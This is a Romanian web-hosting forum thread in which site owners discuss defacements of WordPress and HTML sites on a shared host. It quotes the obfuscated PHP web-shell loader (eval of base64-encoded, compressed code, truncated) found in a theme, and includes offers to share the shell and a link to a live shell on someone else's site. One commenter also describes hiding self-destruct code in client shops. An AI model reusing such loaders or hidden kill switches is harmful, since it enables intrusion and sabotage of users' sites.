Salut

Deschid calculatorul de dimineata si dau sa-mi vad site-ul. Ce sa vezi "HACKED By HaCkErS eV!L" si index'ul si blogul wordpress.

Am aici un printscreen la pagina

http://www.freeimagehosting.net/image.php?c9410e1e07.png

si mi'a lasat in tema de wordpress asta:



<?php
/*
@////////////////////////////////////////////////////////////////////////
@// Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 //
@// Priv8 SOQOR Shell By : HACKERS PAL Priv8 //
@// Priv8 Programmed And Coded Priv8 //
@// All Copyrights Are Reserved To HACKERS PAL And WwW.SoQoR.NeT Team //
@// Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 //
@////////////////////////////////////////////////////////////////////////
*/
eval(gzuncompress(base64_decode("eJykunev7NaVJ/q/P8UZt................./A789oXw=")));
?>

cine vrea tot scriptul, il dau cu mare placere :)

Sunt metode de securitate, sa nu mai poata ajunge asa departe? Sa nu mai "hakuiasca" wordpress-ul?
Ce trebuie sa fac?

update la ultima versiune?

update total wordpress/pluginuri/tema tot

mi-s schimbat si parola de admin..wtf??

si-a facut user "evil" :)))

E de la server... Si site-ul meu care se afla pe acelasi server si este PHP, a avut aceeasi soarta.

Ce tare:))Copiii din ziua de azi n-au ce face:))... si cred ca de plictiseala mai fac cate ceva de acest gen.

Odata ce aveti share host nu aveti ce face, deageaba securizezi tu si nu securizeaza altul de pe acelasi server... singura solutie este sa va faceti backup la tot site-ul, cat mai des.

da-mi si mie shellul :D

@XtrimVersus, nu este de la host, cat despre SHELL, este un exploit postat pe milw0rm despre acest tip de blog-uri, baiatul isi spune sigmus, fiind un flocos de 16 ani.

@TemplateTuners, nu ti l-a "hackuit" cu nici un resentiment, doar ca si tu aveai ce vulenrabilitate aveau si altii.
Da un search pe google cu "HACKED By HaCkErS eV!L" si mai rau a fost ca google a actualizat titlurile site-urilor chiar dupa ce ai fost atacat :D ti-a salvat titlul site-ului dupa aia cu hacked by bla bla dar maine poimaine se actualizeaza inapoi.

Ca o propunere, nu stiu ce pot spune, verifica la hosting-ul actual daca e pe platforma windows server, ca daca e asa... E GRAV, numai hosting profesionist nu e.

Un exemplu fiind http://www.ships-preservation.com/admin/docs/53.1.php , nu am facut-o cu rea intentie, ci ca sa vedeti cam cum arata si ca nu trebuie prea multa inteligenta sa fii "hacker" cum se crede ala doar ruland scripturi facute de altii.

Nu stiu daca a fost un hacker. Poate folositi teme cu plata piratate si au coduri de verificare ce blog au liceenta. Asa mai fac eu la magazine virtuale , pun scripturi de autodistrugere obfuscate ,in caz ca nu este platit in total site-ul, stiu unde sa umblu sa nu poata sa il foloseasca indiferent pe ce host e.

tolby - nu-mi zi ca-mi trebuie licenta si pentru wordpress :)
si site-ul si tema de wp sunt 100% facute de "manutzele" mele

Tolby, presupun ca nu ai avut rabdare sa citesti pana la capat, nu? Site-ul lui templatetuners este HTML nu wordpress. La fel si al meu. Ambele sunt pe acelasi host. Ambele au avut aceeasi soarta. Nu au atacat printr-un exploit dintr-un script. Pe acelasi host am si un subdomeniu care nu era linkat la domeniul principal si ruleaza pe wordpress, cu template luat de pe net. Nu a patit nimic. Subdomeniul cu blogul care era linkat din site-ul principal a fost atacat, desi tema era facuta de mine.

Poate e de la ceva plugin românesc?

Plugin la ce? La HTML? Ce plugin bagi tu la HTML? :D

Mi se pare destul de ciudat, nu am auzit pana acum sa fie spart un site in html, decat daca au fost aflate userul si parola de la ftp.
Sau poate a fost un virus ? Stiu ca exista pentru wordpress ceva care iti imodifica indexul.

Firma la care am lucrat, detine un mini-datacenter. Pe serverele lor, am patit exact aceeasi problema. S-a injectat in toate conturile un scriptulet de shell. Inca nu am aflat cu exactitate cum s-a intamplat asta, insa principala pista e ca s-a virusat PC-ul de pe care se intra in WHM. Acum, aceasta probabilitate este mult mai scazuta, deoarece singurul PC care se conecteaza la WHM e al meu si ruleaza pe Linux.
Cand am patit asta data trecuta, la romaniahost, siteurile au fost afectate aleator, nu toate de pe wordpress. Unele erau de pe Magento, unele Joomla, unele HTML si unele WordPress. Siteurile nu au fost luate in ordine alfabetica si desi aveau mai multe subdomenii unele, maxim 1 subdomeniu era spart.

@XtrimVerSuS: De cand pluginurile Wordpress sunt HTML? Sunt PHP.

Deagle, si site-urile HTML le-au spart tot de la pluginurile WordPress? Voi aveti un fix cu wordpressul...

@XtrimVerSuS: Reciteste primul tau post:


..Deschid calculatorul de dimineata si dau sa-mi vad site-ul. Ce sa vezi "HACKED By HaCkErS eV!L" si index'ul si blogul wordpress...

stiu ce am scris..
am site-ul in root html si in root/iblog wordpress-ul
ce e cu asta?

@Deagle:
1. Acela nu este primul meu post.
2. Eu am spus clar, am intalnit siteuri IN TOTALITATE HTML, fara urma de wordpress cu aceeasi problema.
3. Reciteste ce scrie in acel mesaj!

..Deschid calculatorul de dimineata si dau sa-mi vad site-ul. Ce sa vezi "HACKED By HaCkErS eV!L" si [b]index'ul[b] si blogul wordpress...

wtf??? de ce ne tot mancam unii pe altii? sa avem mai multe "mesaje scrise pe forum"?
- sa o luam de la capat.
Daca cineva stie ca se poate si cunoaste o medota antihack pt html sau wp sa zica daca nu oprim aici discutia!!

@templatetuners, dupa ce ai plecat tu de la siteconstruct am intampinat problema asta. Au fost sparte peste 100 de siteuri. Am analizat toate logurile si fisierele au fost editate de pe server, NU prin wordpress sau alt script. De pe server, prin shell. Singurele variante plauzibile sunt urmatoarele: ori ghici a avut un trojan in PC si a luat parola de la whm, ori wordpress a avut o vulnerabilitate si a injectat shellul prin el. Atunci am avut probleme cu r57 si inca unul cu "c" si nu mai stiu ce cifre... Cred ca tii minte ca la site-ul telegondolei aveam in 404.php shellul. Apoi, la scurt timp a fost spart a doua oara serverul, asta dupa o curatare a tuturor PC-urilor implicate si o schimbare a tuturor parolelor. Deci posibilitatea cu trojanul si cu parola furata a devenit subreda...
Atunci au fost atacate in spcial wordpress-uri, insa nu au scapat nici cateva site-uri de pe magento, html si joomla.

Antihack nu am reusit sa gasim inca din pacate...

www.attack-alert.com

Nu isi permite oricine, dar daca este un site mare cred ca merita. Sunt prieten cu proprietarul, am avut pe un site timp de un, este o chestie ce functioneaza destul de misto, cand se incearca un atac asupra siteului tau, persoana respectiva este banata instant si primesti un e-mail si un sms pe telefon cu datele sale. As putea obtine niste reduceri daca e careva interesat pe aici.

http://www.mondonews.ro/files/hacker.jpg Atat .

http://www.mondonews.ro/files/hacker.jpg Atat .

Ce vrei sa demonstrezi cu asta ?

in resolutie mai mare e ideal pentru wallpaper:D